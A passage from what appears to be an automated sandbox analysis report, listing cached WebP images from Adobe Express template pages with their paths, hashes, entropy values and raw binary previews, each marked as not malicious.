                                                                                                                                                                                                                                                        Preview: RIFF.!..WEBPVP8 .!.......*..k.>u6.H$.".%s;@...en.K.O....W...<"......K.....;.o.O.....X.../.W...../.?P.:..~.?...^>...|.=@?..9.....n...xK...x..../..;_....'....m..}....?..........^..r.O.w..........A.k.........G....+............v-.7./...5.....>....y.\..WH%.. ....UY..v..l..D..|...=...Lzl(....Mi..g....y.R...X.P.1^Z.....PJ.U.sqy;..).qT..s.r.7...J.UW...]..u:..&..Vug.....wz.l2...6.6.)........x..].)Fn..X....q.^~....^.5.Q:RT'#.W.~.>\.........JZ.=|{....e.g..S.73.R.w..dT.T.,....%.o|....8..]..:..6._...Rm1.:..>._..1..4...D.h.#.PVI)...@..=.......r....;.Lh...q.(.n...|u.C.../.......A......8..Q....H.D;..g..;Z..X...[..z... .~..J...j..5l..Z}.....>.GU.1.R}.qF....a.E.9..L......}{....>G$...Q......@...^.*.!.$..SML.u.....r...p....+?.Cg.....(.-.D.......v...]..n.u.Z&...&...&u..*.nT].1MS.q.......1.D|.>..o.......`?l.&.b.....@..-..I..pe..OJ.|C/|...x.....)...&._+.A..+.=...U...?...d..^#A.:r.~...TPQ0#..R'6....y.@..d....ZLZ.u..s;I. .t.+..f.g..{.6...........D..*.J.l.p.9
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1203acb3d260e5e6e58ad701c56479e3ea2f24dde[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13058
                                                                                                                                                                                                                                                        Entropy (8bit):7.98575258195856
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:pCeVWW1Q5fgWELOJ+hKZwmkuLlsUbARcqqfHLnVXxGDFUuj7XzMtP/8aCebMifCO:pC81GPELS+qwUI+PAXwtshebMUn3pV
                                                                                                                                                                                                                                                        MD5:40F31E7D1C620A53849C0EB68A13D79D
                                                                                                                                                                                                                                                        SHA1:5D5E02091ECAA3A78234C7716914D8C91F0F7559
                                                                                                                                                                                                                                                        SHA-256:619F71DC13AD6BF9E97884D4098E8C31FE611E0FFDA50BE4167DE7188989199B
                                                                                                                                                                                                                                                        SHA-512:7030E37E39026082474CBB4741C11A0FF274B9AE21800EBD270E975D6ADFD739D0308D28444A8CACEAE8D94656F715C8F07DC13A31C54A156F8D2B8F01402005
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1203acb3d260e5e6e58ad701c56479e3ea2f24dde.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.2..WEBPVP8 .2..P....*..k.>u6.H....%..H...gn..{.q...hCz..0..e.4.5...|._....z.<...(_y.1...O.?..?.o..f..o.^/..............-.O........tv..^......c..f}M...!.....W.......}{..._.........-....._@.\{.~~.....U....T.2V....n..y`y`......G.<x......T.\+.q.rN.-.@.M........M)./.E.....Ax.].P...V..6.F0p_w.r..]-.>..y_...)..T.y+....&.{....T.K....+....Z....ZS.....V%....s...b1..h..W....Hh.p/...%.Ov..s.... ..".bB...)y.5.8.....W....)..p...8..>..:/.BB.x~2.GS.S`...3U.*s.a..)Yi.jV..X...^8..p!J....^......,........hR....ia..Av..[O.}.a..d.......*......&......na>m.k...>....+.cN.?.W.Y@Vs.H....S..}:...g..1C..S......a..J. ..[..#>YJ.L.ok.q....Z1.\.t=...e(M...=25L..r.5..~Vy.&.......f].`6&.....uW...x.l.ZE.~..$...(.....n.v.CE.r..k..d\..9%.X-a.1$.".f.(3&Y..1S.....f.'auQ./!;..9.+....u]#r.e...K....sH.y.a:."q.]...2.YE<O..![..&>.t.!.7[....&v;.....Mj[.E.0..{......N.....XXv.@..k.+.a...0x...j....#..?.L.ZY..5GY.SM...j.@...^....r........../.o....-../mF65:<..3V-......y.!.R.i.......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1214e0e49cb388dca5a84c369402d152a38682f84[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5708
                                                                                                                                                                                                                                                        Entropy (8bit):7.965305970259403
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:QkungeXPS1mCH5eaJ1pjCA91DQ8Ix+1UNo/sKLBm/I3itzTvMkfmOy1:Qkugefh4brpjCuFExiUNMlWIkzw9Oy1
                                                                                                                                                                                                                                                        MD5:502945F63FBDD30964F4CE97871AF3A2
                                                                                                                                                                                                                                                        SHA1:E30785AE564B46CCCABA0B4CB2E1FA05B4ED0368
                                                                                                                                                                                                                                                        SHA-256:9AA4349900A643FE5FF83FD15985F121A4A155D9D8DB421F5BFDA166A9CA5ADF
                                                                                                                                                                                                                                                        SHA-512:6FB9FE7F0A5827D9FEF27690AE519BBBB37A7F68E00D1FFC8799BF60351F085B775285B2BD8AFBAAE3D67AA7D1E4A0064917F62AB4FBE1A16ADF7C111BA4132B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1214e0e49cb388dca5a84c369402d152a38682f84.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFD...WEBPVP8 8....h...*,...>u8.I$.".#.:(...en.ru.^...f............E.....Y..W..?1.s_...?...z....j...W.....3..?.gU..?......C......w8.H.)..?....C._}?..r............w......o......._....?.|..y...G.o...?.?..}...b...G.o..k?H...1...........?...Q....t...M.....K%=L...Y...~.\(mF..&.P......||L.).}p.....1..y.4KsB.J.....5.I..)....Uka....bn.....eW.%.H.F.).Vl..."*(xT^P.ID@.!-.{......^ZyY...g8.Z...$..6@PW6.aV.+.<.v.9....f....z...W...5...w.P+......L....Q.X...{.L..n...,.,.........wj..oz./.u.DN'......"1f.Z..^>....i~+[+...U.<i..71...fd...u.....1...l..1v.-...0....u.....$.,.d@....-k:..Y.B.\9...b..bX...$N..p...#G.k56C/........s.. gK.gsL,........N.....Bu.#...d...m{[8..}l.@:...>..d+......j.S..u.....[.X.4&....N.{$.%\.[w.P.o.....Y.J^.R.Bu...i...0Y...z.((..'........>.t.f....f...jk?.0.@.N.._!O.....Cj6..a...t..}p.....Q......../.........<~......o>_le7...u..?...0.N9.P..........^.?...'!g.G.j .....-..t#..-}s....I{.J.+......;.I.YI...q/.vK.eG..(=5n.....<...*.P.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_12be25e65cc93e1440bc25fe8d545d5755fbd3f9d[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12744
                                                                                                                                                                                                                                                        Entropy (8bit):7.984434447626562
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:m2VKB+rxH6ZgKPsL5Dw6qXoDYr9FplMsIyBo/1a:mfK6Zg6U5E64oK9FXMGo/E
                                                                                                                                                                                                                                                        MD5:75340F2CA756FB72A15C6A269E20C3B6
                                                                                                                                                                                                                                                        SHA1:96157EBE0D3D143A2C6B11F52D881C0AA9BA01E5
                                                                                                                                                                                                                                                        SHA-256:8A1461DA7256179A86600B5C14F2BBDEF900851D8F40D82FC7B438AF8D89DEF9
                                                                                                                                                                                                                                                        SHA-512:C72DE25E4AB647F10E062012DADE8B3FBA672A2AA529AD1EB320665F54AD40A3F5C1F32657BF424118BF7CB8018DE09A0E0C4A0BE20F42D9F0F9CE9749525E28
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_12be25e65cc93e1440bc25fe8d545d5755fbd3f9d.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.1..WEBPVP8 .1......*..k.>u2.H$..!.w.H...gn.[....IL...?L;y..lp.j.....g.?w................".u.M..................b.i....P_.?..........-..G./..Q...w.../@.I......O...?....;...Y.[.....?....5.s.....w./.?..h>.?......S.W.........o...../m_...?s.....O....~..."*&...H1...-....a3#..;[..z.'.-../..B..i:.&........}.....x..G.f.,x56....N:t.k....m7.Y;.?...NW.h<<m.......U.Y.ya9.i........O..1Y....}...q...rA.,Q....2..;.-.N.|.~W.*Y.O%H5WP<....+4l.t|Eh.xX..ZwH.7F...h.-.VL...]0........|...'....,b..*Q.F...N.i..]lQ.............?...o....l..+..lb..\c.O.(...0.q).....>..J.(4.52.....4.)....Qr.2..h.R.^..>;.=...3.7....pr.z..*.;..&..O1)t.....{...v.32j).S........q......<..1........LK....<{.M...[.g. .....KV..q.,..jO..s..4.a...b....7..G#..TaY.YO/yX=1....D...QS.."9s....yR..Q.....6.......r.Vo4R..U...[K..$..Y'.j..w.._.W.....K......5..2...-..1.m~...2.,Y...PF..+..'./...&.....Q..QD.....N.3Y...G0...!..W|_y....a.ZK.n.l.,.J..........4................*a.8...5\.........nA_/.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_12ffb8f594d179340cbd2d62c4c20754c61bef675[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9050
                                                                                                                                                                                                                                                        Entropy (8bit):7.977963494130041
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:A0TLhO72UStgZBt52PVmJKn+bA69ajuwYbL5npPjErN3QTIu+DFAiK:vTLhWyOBt52PVObdajbYbL5nd4hTu+Fo
                                                                                                                                                                                                                                                        MD5:16B03AE7E942E7CA2A756CFA4865A71A
                                                                                                                                                                                                                                                        SHA1:2CA89B1B463E27B5C1D90E7073C7A99FA3513144
                                                                                                                                                                                                                                                        SHA-256:08C2F5D4031764B1C4968B8195EEEEC7659BC1154656C0830D4AD632C4382A95
                                                                                                                                                                                                                                                        SHA-512:72F43FCF3D9591C07016C86A649678C8AB055952CA0DE8B8DBED7B75D1AB3ECDECB5E4BB0CC7FABB28B906794769E7D93A1BBBEE9DC8C45ECE48CC9D50D9B4DA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_12ffb8f594d179340cbd2d62c4c20754c61bef675.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFR#..WEBPVP8 F#.......*..k.>u6.G.."!#.l....en.|...`M.{6......8...._\..TG......7...........[.G...............'.O.w./._....j.E...._...o..........].c..._..............._.?......V......:.Y{....q...........g.....OTHp.>z...Yq.w#Ki)...7.L..j@../.&G.J.I.l...9.1.)Ns.....%.nT..Lc..E5.GkPw.a.."T...._I[B.Y].qT,+.R.>.x..b...i....$.2.^d.p....S..+..x.....*P.....*..=...'..r..e.4...>`../D..?.9.=z...}.v7..{.l;$....h..K....Sr.D8J.}..N..,]Q...N.LA....:+.u./@.,.$ow:.q3..-.Se....I.r.W.m.X.V..|....&.h&.....m...=..U..v.%L.+.ep.z6..Z..dlK...,..H.1`..L.m|.#..Vi.... M.H....\.....X\..4..!..(:..z.8P./Owvj.'[.../n..T;...(.......#F..0Q~D.G#.0...uD.-.8..F...+...|(.t..`..rY..Mfz.Q."..g....(\Z.....L.~...u..J..(.q....=@B{.:..`.Gn..bl)....;.j.F..)?%.7.+..gB.+.9.z.|. ]/.28%x.}..S..i.......%Z......:...!.[?..I7...9[5..P..rwy09....H...#..&u...%.......,.. B..-.Y.&..<..._...J...M..^I..#L..R.i.5..&...k'..".:...d.Yx.3.N.x..3..g.....}.B...1*..8....A...D;..........~Li.G..<H.L....X.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1305c910c0a67cde46c623497f55543f11073ad37[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8360
                                                                                                                                                                                                                                                        Entropy (8bit):7.526038660340304
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:iTo39Suu0GeweXkwDVC+rcAjAkkHqSbYBKWoy/9D:iwGi15V5jWSok9D
                                                                                                                                                                                                                                                        MD5:396D3A51520B2A4909BDADFD389DEB05
                                                                                                                                                                                                                                                        SHA1:C7E82C11A8A5657353A1AC24747D2947AB2548C9
                                                                                                                                                                                                                                                        SHA-256:FDAE6BEFD121ED601DC35AC46B10CD9DEAE9A1B774FED0499863F3A802D48F2C
                                                                                                                                                                                                                                                        SHA-512:D18801C9D405CDDCD5AB8C36A364C69007A70346B7F60D698123DDEC777374AD440CDF6F7A078358663C79C03B4F6888F348250A4CA566E4B610787BCB3BC0BE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_1305c910c0a67cde46c623497f55543f11073ad37.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF. ..WEBPVP8 . ...F...*....>u:.J$."!... ...in.wa....r.......~.{.(.m.{.o..d...u...../...O...?...}s............'..?.........."...........8.......+........P...g.d...../......>.Y....?...._y|..(.....{.;.....8........>y.g.....G...t......<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x....<x......7...<x....<x....<x....<x..b.....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_136c5cb6ad4a0d600e590f39420d670bb0df6b5c3[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10908
                                                                                                                                                                                                                                                        Entropy (8bit):7.98224084555292
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:6nqEHXvk2yWmbxzITPo+PpstostXzartUR+IZTdj6MB86yNn0CU9Dncz9r:lEH81aZWys5zKyd5INnTUFcZr
                                                                                                                                                                                                                                                        MD5:37E2D15C114E6D43DBEB510CE1C12927
                                                                                                                                                                                                                                                        SHA1:3173B72D47EA2685B7F3D25ED6BEF3E66E2018B7
                                                                                                                                                                                                                                                        SHA-256:0600C75B7CD5433C681620372ED2E5704D35E46B191995AAF1088C1D1A5B9579
                                                                                                                                                                                                                                                        SHA-512:4DF6A1912D55B31CD664607562E31F1186C68988270A2EF4C95F11F64408A869D00DA8A686DCA505AE30107B50D3E86AE6519714F12CAA67B57C273D70825291
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_136c5cb6ad4a0d600e590f39420d670bb0df6b5c3.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.*..WEBPVP8 .*.......*,...>u6.H$.".$v. ...M..*.....%.>....V....?.,k.?...y..?.c......^.............G............(.....w...O..........h~....H.....7.......P...l.a...W.O._...+.....r.yr..v._,...?.x..............._._.|..&i.....z....o...........>.?.?....../..._......[...?.?.........[....._8.........W./.O.>.?...~....T....i>.C.%..?...>.rv....w....G..]......O,..E.1..4.O...H.=..r.j#iZM...y.\2V..5......:....M-...I|..6...."...........D.rLcp.......Fb.....=..i .a./......./.-..]..X..e..Q..,.Vm..5.hp[.....D.:.S......f.7......D0...5=.[\j{.G.&w....g.4....PB..v94..5C.....[@..8.6.7.?....l.~#...z.......Vb|/y...4?.f.G...1Q.Pm#.m./.}e../N|&.....-.6......qJ2...x[....Y.&...,Qp.Q.=+.......L]n.....`V...v......U.t...Jg.....y.7x...IH^...........G.'j.%...x....Vhq.....O$..+....B.............J"..........,...o...${.o.mT......X..k.O.O..d...P.`.C.5x=\.M.k..`8...d..m)..x..9p.G:!>..e..?@#.......le.)#.$L.P..&..|......n.G.....X.A........U.Yi...FY./.p...s.:.g..s...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_13f1bc71a8681cdd7cb22c202f5a3c11bce1c01b5[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12628
                                                                                                                                                                                                                                                        Entropy (8bit):7.982545840794857
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:SfcrQbUMDW4yQORBvyZ5zfcSeNPW2g6hx:7uDWd97vyZ9UfNe2zhx
                                                                                                                                                                                                                                                        MD5:C82FA189EE214CD72B7CC9BC103291C1
                                                                                                                                                                                                                                                        SHA1:D940ABFD7668D8A04ADF4419CB8A4B44542D5781
                                                                                                                                                                                                                                                        SHA-256:13E2F45B312E32569613AB0CB690B04F6F1FA51322678D758AA6D9568E2D8366
                                                                                                                                                                                                                                                        SHA-512:A4A2AF1170B19070B92A78158CDB31DEF3088AE222E0D059A2AAD4C4953332E85771F16E3FE805E5A8CF97C9CDB21A88B9013730A058FA5FF989B739E3C1E66B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_13f1bc71a8681cdd7cb22c202f5a3c11bce1c01b5.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFL1..WEBPVP8 @1.......*..k.>u4.H$...&r.ip..in..Tq..a?.C...s...........{....[.L.....y.....W...?..g..._......_.../..'.....#.?....7........g.......?..]..../......~....{.........?...}7.y................{...?......|1~...@R%~..De`.".c...D.y.8._..8.F|.i[xM......v.a.x...R..2....+....H$.fN..kt..%j@.t...6oK...mI.4 .\..r.#im.UI....e.q......vQ5..8o.6.D..Y.y{.\G}M..........T...iJ..}t.2zg..FD..m..}=1{.f.....pD..dd|.CC=........\L.[l...^h..s....K.].=M&..2...J..n.....j.......&...2.]..........UT......?..3.....U....}......2..f.Ct.a7kh`[$.x_.7&8.?..tz........3'...?.+C...{+W.soKp+.Y.....X..~(........A.G+...u.j.cAr2..f.....HZ..2GZ...k....5.*..T..iv:+....8Il....{..;bQ..|.....`..r.../_....R..."o.T.:...1.....X...rp%.p.&<^4.Rh.@.#...S..<..N...#....{+h>vRO.....p.``._x...6..2....(..U.U..q..3Z.3..j......C........(&...X+4....H....n.]..^.c.....~@v.#C...?._x...G.....V)MP..4..'?..D...?2.r.....j..w.....Q....'....%}......J.....0x3...\...H..'+..o....O....n..!.u..t|.(
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1414f90572f278eae7d49cf2222e9b7d0063180cd[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):7583
                                                                                                                                                                                                                                                        Entropy (8bit):7.9682402325669415
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:OvaQ0itv25JIQNCSCNXgB1dbwIAKlf0AT4CdY:OvftCIQ6NQnNhnJu
                                                                                                                                                                                                                                                        MD5:5A509325B04D91D2F591B9354DBF978A
                                                                                                                                                                                                                                                        SHA1:5B3FD56483BE38F599D69F7E84ABBE260C98C11E
                                                                                                                                                                                                                                                        SHA-256:B194025E947012B53598A578437208ECAA6EE2BFEBED193E02C08131CABB3E64
                                                                                                                                                                                                                                                        SHA-512:DE5B557E1865BD69228ACC9C81C5DA4D733F08CA38A28CEB6B1D50FFC68408FF664CA726FFFB975C53D74D717F0D84FC7BF10DD8482DB2DEA9C81F088157C02D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8X..............ALPH.S....X...mj...&|......<.".?.#R........5.....|.#..R..J...J.M..I "..].........4...."..}.:..PD'1Q.Py..O.7^.t..0.............$e\..$.:P.M,.j.t..Z.T.ng=(..p.R.G0.`.Lf..#....m.HR.]..........R..Tq^.&'g..4=c.N.,...i.U.....YMP..M..Q.$9n$!..o.4..$.P@.!v#&..d[m.'Dy..r.]....y..M.d....&/f^..._.....9.>..TM...-.A..l.ms...%.s.:....b.....d..~3..1..ql.}...=W.o..m{.[3kf.Aw.R?~".Y......DD.,.v.FA........h..84u`..A.+..4..a......./..q...rp..+.`..Xd.....G.a....sv0yV.\Q.r..B.....'.<)l~..\...O..... ........4..........{..^.]0~s..a.LN%....*.7N..h..........u.!...x.F?..jZ.fE...q.......V..J..g-sz8)*.."@.?...;=..Sr....8..wN.{...X...G.....Y...N!'.>cy.......k-s6>.x..x<..VV..W\..pP....!.(..8.a>\.Q.../...A(Y......q.......]..!...n..B...%.B3....*f.'u.AS.....m..k.t...o.........\...R].sj5\.'.[b.....V..y......Y....c.+..9..`....E...Y...D- kX....0=.......9..U.U. ....m...N...z...F;.I.j...C1/.#.7e...K.>J.i..%...0Y...v*...[.N....P@....M......5l
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_153a9944efc4f66008369b127ef8ac607cf5a2f2e[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15502
                                                                                                                                                                                                                                                        Entropy (8bit):7.98589541672613
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:4avLotIiOGdeULbLu3O1Uy+SJjPsZrjnHxgAFJYAZuGCw:WnXz3yOMAjynHOeYAZu/w
                                                                                                                                                                                                                                                        MD5:83419D67087B63320C68B3EBC4555826
                                                                                                                                                                                                                                                        SHA1:062F4932098A68F9599C2C99EF53294401BBE559
                                                                                                                                                                                                                                                        SHA-256:DA81D743FB878FBA7554DABC55A0964C052A6D56F5A8D4FBCB66E9ECDA2B16D7
                                                                                                                                                                                                                                                        SHA-512:207484B4A0B0A3A1AB81CFDF3510BE45D8B3DE74EA517F875E401813288E04DDD637E41D3C268BBDEB3A68D03CF705A193AF1BDDD92C4A802A690340500F7B84
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_153a9944efc4f66008369b127ef8ac607cf5a2f2e.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.<..WEBPVP8 z<.......*..k.>u0.F...!)..h...bn.Pt.5......>..;~.Q{./.......=C.\.?.........Ov..?............I......I.........o..........w......._.....@?..f.......^.;..'....<=_.O.....1_.._>.Q...~.e.......N..........?.z.|w..r...{........|...@.R...s..........V..._.3.?..i>....q...W.S....?W..~..........'...u........\...o7. D-........qa..L....7s,..C<.V.C5.=..zJ........8......=..S.....E......Z....F.KL...K...@]..i....g.w...n..Q.q5%..A.......o=..!..^..{".x....V....&....>.&}..3.....V.~. D*.G.Wg.%....".xS:.q.z..h&...F.$.JZgb.Wj:...-.HT.......u...a.../E;.@fx.:.U..4....2.s=?1K....'.ewB7....wc\.....1....q.Y.......z......W....La......Uoj..Bm.k.vN....J.D..<Y]ke...M.J.H0..qS.y.........s-/.....c.x%..:.X....s.8Y5..2j....jdE......;.....2......h./...s?..gO..".l$....d....yS...Kl.ly.T..[.=b12....jh..=5.sV..^{..+p..J.q9F..2......R/..n...K...Lm.CU..Ee../..L...s..,...'...fi..soq....R....=hO_......H...k/.j....{..U...|../U.A......J.r.y....f./6..aj.....t..j...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_174ecc6dbabbb98eb5dde237dabdd3d20371598c0[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6630
                                                                                                                                                                                                                                                        Entropy (8bit):7.970522293634058
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:3yvE4jwT3UtIyVpeydV1pozXsbgRrFoeAu+ZDJ5y:ivxcTkt2GzbGFI1Zzy
                                                                                                                                                                                                                                                        MD5:10A85D06B222424CC9C9571EABBA257D
                                                                                                                                                                                                                                                        SHA1:5C9CCFE9E6E864EB79EAEAE478E8DBE444BFFF9E
                                                                                                                                                                                                                                                        SHA-256:F554F18D1C2B96AC105581380A48F0BEFCBF4057B04FDB117D0A2856884F4BED
                                                                                                                                                                                                                                                        SHA-512:A174DB99E8EE9BB1D976C498C3A4F20CA17CFC49505855D54A853D7589E8038AF99B38C844474C6BAD85D488242BD0E7EC8AE5EF8AD778B14C14CDB5B5192D2C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_174ecc6dbabbb98eb5dde237dabdd3d20371598c0.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....0y...*,...>u6.I$..."TJ....en.*....o...].i....x.sW..X_.}@~j.c...W._....xO.>.<...=...=.......w...?.~My.......{..2.............x..P/........+....z..o._..n....#.g..p.......n|.............._.'...?..........G...[.....~....k...3..7....t....D..&$T.1"....~..EA..*.....X0.&..$$.9Qe.d_>.GJ.f:...@W)..>5|K<.......,..V...[...D.',1.)...D....v.#[...=+(3.......K.MQ.._...~..nr..?.Mb<B.U..5uo)z[G`.bRf^.....G.g..;.Z....O...f.......A\.5...S.\:.&.t.Jp2'..6....XXc.....3i....>./@..@.2..L..,g.*.......{...(.',..`.v.2.. 8...f._...MRo6}.7....L.m.?......;.\...nL.e_.!d....4.....3-.....$J...\.E2%..O..r.....m......r.<.O.....W.K.......*E.<....+t.1........>W.g.r.JY..a.@;....r(Z..V..=?[..../.l,.Om..XtH...X.x4.x..=.........,...5.UD......@..F.(.}_<..j.u]r..d....q#')A.r.jZ......C.+0.7..$U..h...S..I.?.....w/.*...3F....... .;.4.>....(.5.-w.....>D.Xq...gt.....0...<..&.$v`.Z-@...A.DK..O..9xy......)....Ha{..u...>..cJ..B..h...kB.<.w46G.f...6..."....LH.2bEA..*.....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_17f1e6d035b268330c49c1a92e3daa7ac9e6a1844[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9224
                                                                                                                                                                                                                                                        Entropy (8bit):7.976810066591466
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:XxtpXv4v5LjWWYi38uwc6mc75lroS9EHEWRerO6bdGb3tHv:XTpXv4x2WYNuwcOzrl9EHtReTxGt
                                                                                                                                                                                                                                                        MD5:F63210EFD2178990D5D077B20BB4F468
                                                                                                                                                                                                                                                        SHA1:6FFD154323C6BC68190A28F0FD306F1135E79D35
                                                                                                                                                                                                                                                        SHA-256:2FCC885BFF41C1BA0F3003EDDEE547B8D198D5E27B7452A7D5597C827BAF6F0F
                                                                                                                                                                                                                                                        SHA-512:891DBD2D38056FBE406546FF4A45D1D0A3823F7BCADC75E444A39B4A730AD2C671899378F3BB8B0B6AD70035C6F5B6D4A8822BD0E11C3BC2821E18A4C2E9E79E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_17f1e6d035b268330c49c1a92e3daa7ac9e6a1844.png?width=2000&format=webply&optimize=medium
